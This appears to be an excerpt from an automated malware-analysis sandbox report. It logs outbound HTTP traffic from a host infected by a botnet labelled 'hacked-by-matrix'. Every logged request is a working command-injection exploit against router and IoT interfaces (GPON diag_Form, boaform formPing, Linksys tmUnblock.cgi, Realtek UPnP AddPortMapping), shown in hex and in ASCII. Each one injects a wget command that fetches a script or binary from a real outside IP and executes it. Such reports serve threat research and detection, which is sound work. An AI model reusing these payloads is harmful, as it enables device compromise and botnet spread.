                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        424192.168.2.135946042.154.32.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516835928 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        425192.168.2.136058062.77.95.1031723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.604718924 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:21.677962065 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        426192.168.2.1343792172.247.34.5055555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:21.233465910 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:25.455323935 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:31.596357107 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:43.628381968 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:23:08.204272985 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        427192.168.2.135242693.110.189.1952869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:22.772903919 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:23.596268892 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:25.196253061 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:28.525635958 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:34.929299116 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
